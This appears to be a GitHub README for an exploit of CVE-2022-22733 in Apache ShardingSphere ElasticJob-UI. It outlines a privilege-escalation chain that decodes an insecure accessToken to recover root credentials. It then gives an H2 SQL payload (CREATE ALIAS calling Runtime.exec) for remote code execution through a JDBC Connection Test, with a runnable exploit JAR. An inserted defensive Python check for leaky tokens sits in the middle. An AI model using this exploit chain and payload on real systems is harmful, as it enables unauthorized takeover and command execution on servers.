# CVE-2022-22733

CVE-2022-22733 is a vulnerability that affects Apache ShardingSphere ElasticJob-UI 3.0.0 and below versions. The vulnerability leads to privilege escalation, and by abusing the escalated privileges a `JDBC` attack can be performed to achieve RCE. You can read the vulnerability analysis from [Here]( & the step-by-step exploit-writing blog from [Here](


The exploit works as follows:
- Log in with the low-privileged account.
- Obtain the insecurely generated `accessToken`.
- Decode the insecurely generated `accessToken`.
- Parse the decoded data from the `accessToken`.
- Retrieve the `root` account credentials from the parsed data.
- Log in with the `root` account credentials and obtain full privileges on the application.
- Send a Connection Test request that abuses the `JDBC` attack.
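
A regression check for the token weakness in the steps above, as an added example that is not part of the original exploit or of ElasticJob-UI: it reports any known secret readable from a token after Base64 decoding, and contrasts that with an HMAC-signed token carrying only a username and expiry. The Base64-encoded JSON token layout, `CONFIG`, `KEY` and all function names are assumptions; the page does not specify the token format.

```python
import base64, binascii, hashlib, hmac, json, time

def _b64(part):
    """Decode standard or URL-safe Base64, tolerating missing padding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def leaked_secrets(token, secrets):
    """Return the secrets a token holder can read by Base64-decoding the token."""
    views = [token.encode()]
    for part in token.split("."):
        try:
            views.append(_b64(part))
        except (binascii.Error, ValueError):
            pass
    return sorted(s for s in secrets if any(s.encode() in v for v in views))

def issue_token(username, key, ttl=3600, now=None):
    """Hardened form: carries only identity and expiry, authenticated by HMAC-SHA256."""
    exp = int(time.time() if now is None else now) + ttl
    body = json.dumps({"sub": username, "exp": exp}).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    enc = lambda b: base64.urlsafe_b64encode(b).rstrip(b"=").decode()
    return enc(body) + "." + enc(tag)

def verify_token(token, key, now=None):
    """Return the username if the tag is valid and the token is unexpired, else None."""
    try:
        body_part, tag_part = token.split(".")
        body, tag = _b64(body_part), _b64(tag_part)
    except (binascii.Error, ValueError):
        return None
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        return None
    claims = json.loads(body)
    current = time.time() if now is None else now
    return claims["sub"] if claims["exp"] > current else None

# Constructed sample data: hypothetical account configuration and signing key.
CONFIG = {"root": {"username": "root", "password": "constructed-root-pw"},
          "guest": {"username": "guest", "password": "constructed-guest-pw"}}
SECRETS = [CONFIG["root"]["password"]]
KEY = b"constructed-signing-key"
# Weak form (assumed): the whole account configuration, Base64-encoded, as the token.
WEAK_TOKEN = base64.b64encode(json.dumps(CONFIG).encode()).decode()

if __name__ == "__main__":
    print("weak token leaks:", leaked_secrets(WEAK_TOKEN, SECRETS))
    print("hardened token leaks:", leaked_secrets(issue_token("guest", KEY), SECRETS))
```

Run against tokens captured from a test deployment, `leaked_secrets` works as a release gate: a non-empty result means a low-privileged session can read a secret it should never receive.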

# Usage
You can download the `JAR` file from [here]( & the source code from [here](

- Execute `jar`:
```
java -jar CVE-2022-22733.jar
```
- SQL script code:
```sql
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
```
# Demo